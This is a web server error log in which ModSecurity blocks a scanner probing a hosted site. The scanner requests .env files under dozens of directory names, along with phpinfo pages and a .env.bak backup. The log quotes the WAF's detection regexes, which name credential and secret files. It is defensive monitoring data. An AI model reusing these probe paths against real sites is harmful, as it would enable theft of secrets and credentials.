[Tue May 26 14:16:59.963568 2026] [security2:error] [pid 598542:tid 598554] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/front/.env"] [unique_id "ahVeA_4iWyZxnXeAW3JVFQAAWAs"]
[Tue May 26 14:16:59.981428 2026] [security2:error] [pid 598542:tid 598559] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/frontend/.env"] [unique_id "ahVeA_4iWyZxnXeAW3JVGQAAIRA"]
[Tue May 26 14:17:00.052474 2026] [security2:error] [pid 598542:tid 598606] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.dimcorp.jhonweb.com"] [uri "/infophp.php"] [unique_id "ahVeBP4iWyZxnXeAW3JVJQAASD8"]
[Tue May 26 14:17:00.052861 2026] [security2:error] [pid 598542:tid 598603] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.dimcorp.jhonweb.com"] [uri "/infos.php"] [unique_id "ahVeBP4iWyZxnXeAW3JVJgAASDw"]
[Tue May 26 14:17:00.052987 2026] [security2:error] [pid 598542:tid 598595] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.dimcorp.jhonweb.com"] [uri "/info.php"] [unique_id "ahVeBP4iWyZxnXeAW3JVJAAASDQ"]
[Tue May 26 14:17:00.081910 2026] [security2:error] [pid 598542:tid 598608] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/laravel/.env"] [unique_id "ahVeBP4iWyZxnXeAW3JVKwAAV0E"]
[Tue May 26 14:17:00.101654 2026] [security2:error] [pid 598542:tid 598610] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/lms/.env"] [unique_id "ahVeBP4iWyZxnXeAW3JVLAAAaEM"]
[Tue May 26 14:17:00.127007 2026] [security2:error] [pid 598542:tid 598611] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/local/.env"] [unique_id "ahVeBP4iWyZxnXeAW3JVLwAAD0Q"]
[Tue May 26 14:17:00.138699 2026] [core:crit] [pid 598542:tid 598614] (13)Permission denied: [remote 45.148.10.95:10086] AH00529: /home2/jhonwy9v/dimensioncorporativa.com/login/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home2/jhonwy9v/dimensioncorporativa.com/login/' is executable
[Tue May 26 14:17:00.155504 2026] [core:crit] [pid 598542:tid 598638] (13)Permission denied: [remote 45.148.10.95:10086] AH00529: /home2/jhonwy9v/dimensioncorporativa.com/login/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home2/jhonwy9v/dimensioncorporativa.com/login/' is executable
[Tue May 26 14:17:00.161990 2026] [security2:error] [pid 598542:tid 598598] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/market/.env"] [unique_id "ahVeBP4iWyZxnXeAW3JVMwAAMjc"]
[Tue May 26 14:17:00.184151 2026] [security2:error] [pid 598542:tid 598639] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/marketing/.env"] [unique_id "ahVeBP4iWyZxnXeAW3JVNAAAdGA"]
[Tue May 26 14:17:00.193522 2026] [security2:error] [pid 598542:tid 598616] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/media/.env"] [unique_id "ahVeBP4iWyZxnXeAW3JVNgAAYkk"]
[Tue May 26 14:17:00.213513 2026] [security2:error] [pid 598542:tid 598664] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/new/.env"] [unique_id "ahVeBP4iWyZxnXeAW3JVOgAAHHk"]
[Tue May 26 14:17:00.216314 2026] [security2:error] [pid 598542:tid 598582] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/node-api/.env"] [unique_id "ahVeBP4iWyZxnXeAW3JVOwAAHCc"]
[Tue May 26 14:17:00.236185 2026] [security2:error] [pid 598542:tid 598665] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/node/.env"] [unique_id "ahVeBP4iWyZxnXeAW3JVPAAAWno"]
[Tue May 26 14:17:00.261754 2026] [security2:error] [pid 598542:tid 598621] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/node/api/.env"] [unique_id "ahVeBP4iWyZxnXeAW3JVPQAAQk4"]
[Tue May 26 14:17:00.279127 2026] [security2:error] [pid 598542:tid 598620] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/node/backend/.env"] [unique_id "ahVeBP4iWyZxnXeAW3JVPgAASk0"]
[Tue May 26 14:17:00.285613 2026] [security2:error] [pid 598542:tid 598623] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/nodeweb/.env"] [unique_id "ahVeBP4iWyZxnXeAW3JVQQAAL1A"]
[Tue May 26 14:17:00.285767 2026] [security2:error] [pid 598542:tid 598624] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/nodeapi/.env"] [unique_id "ahVeBP4iWyZxnXeAW3JVQAAAL1E"]
[Tue May 26 14:17:00.333807 2026] [security2:error] [pid 598542:tid 598630] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/old/.env"] [unique_id "ahVeBP4iWyZxnXeAW3JVRwAAElc"]
[Tue May 26 14:17:00.342114 2026] [security2:error] [pid 598542:tid 598668] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/opt/.env"] [unique_id "ahVeBP4iWyZxnXeAW3JVSQAAS30"]
[Tue May 26 14:17:00.516269 2026] [security2:error] [pid 598542:tid 598544] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.dimcorp.jhonweb.com"] [uri "/php-info.php"] [unique_id "ahVeBP4iWyZxnXeAW3JVYgAAXQE"]
[Tue May 26 14:17:00.520810 2026] [security2:error] [pid 598542:tid 598543] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.dimcorp.jhonweb.com"] [uri "/php.php"] [unique_id "ahVeBP4iWyZxnXeAW3JVYwAAUAA"]
[Tue May 26 14:17:00.533285 2026] [security2:error] [pid 598542:tid 598618] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.dimcorp.jhonweb.com"] [uri "/php_info.php"] [unique_id "ahVeBP4iWyZxnXeAW3JVZAAADUs"]
[Tue May 26 14:17:00.570706 2026] [security2:error] [pid 598542:tid 598573] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.dimcorp.jhonweb.com"] [uri "/phpinfo.php"] [unique_id "ahVeBP4iWyZxnXeAW3JVZgAAXh4"]
[Tue May 26 14:17:00.586024 2026] [security2:error] [pid 598542:tid 598635] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/portal/.env"] [unique_id "ahVeBP4iWyZxnXeAW3JVaAAAcVw"]
[Tue May 26 14:17:00.615491 2026] [security2:error] [pid 598542:tid 598647] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/prod/.env"] [unique_id "ahVeBP4iWyZxnXeAW3JVawAAGGg"]
[Tue May 26 14:17:00.640550 2026] [security2:error] [pid 598542:tid 598637] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/product/.env"] [unique_id "ahVeBP4iWyZxnXeAW3JVbwAAHV4"]
[Tue May 26 14:17:00.645461 2026] [security2:error] [pid 598542:tid 598653] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/production/.env"] [unique_id "ahVeBP4iWyZxnXeAW3JVcAAAHW4"]
[Tue May 26 14:17:00.659705 2026] [security2:error] [pid 598542:tid 598659] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/project/.env"] [unique_id "ahVeBP4iWyZxnXeAW3JVcwAAH3Q"]
[Tue May 26 14:17:00.668359 2026] [security2:error] [pid 598542:tid 598547] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/public-api/.env"] [unique_id "ahVeBP4iWyZxnXeAW3JVdQAAHwQ"]
[Tue May 26 14:17:00.679699 2026] [security2:error] [pid 598542:tid 598658] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/public/.env"] [unique_id "ahVeBP4iWyZxnXeAW3JVegAAOXM"]
[Tue May 26 14:17:00.700232 2026] [security2:error] [pid 598542:tid 598549] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.dimcorp.jhonweb.com"] [uri "/public/phpinfo.php"] [unique_id "ahVeBP4iWyZxnXeAW3JVewAAVgY"]
[Tue May 26 14:17:00.732213 2026] [security2:error] [pid 598542:tid 598660] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/public_html/.env"] [unique_id "ahVeBP4iWyZxnXeAW3JVgAAAEXU"]
[Tue May 26 14:17:00.740450 2026] [security2:error] [pid 598542:tid 598571] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/qa/.env"] [unique_id "ahVeBP4iWyZxnXeAW3JVggAAERw"]
[Tue May 26 14:17:01.039200 2026] [security2:error] [pid 598542:tid 598588] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/s3/.env.bak"] [unique_id "ahVeBf4iWyZxnXeAW3JVqQAAAy0"]
[Tue May 26 14:17:01.122389 2026] [security2:error] [pid 598542:tid 598791] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVeBP4iWyZxnXeAW3JVeQAAAHc"]
[Tue May 26 14:17:01.128178 2026] [security2:error] [pid 598542:tid 598559] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/server/.env"] [unique_id "ahVeBf4iWyZxnXeAW3JVswAADxA"]
[Tue May 26 14:17:01.128523 2026] [security2:error] [pid 598542:tid 598600] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/server/api/.env"] [unique_id "ahVeBf4iWyZxnXeAW3JVtAAADzk"]
[Tue May 26 14:17:01.185111 2026] [security2:error] [pid 598542:tid 598646] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/server/backend/.env"] [unique_id "ahVeBf4iWyZxnXeAW3JVtgAAMGc"]
[Tue May 26 14:17:01.272107 2026] [security2:error] [pid 598542:tid 598610] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/service/.env"] [unique_id "ahVeBf4iWyZxnXeAW3JVygAAdEM"]
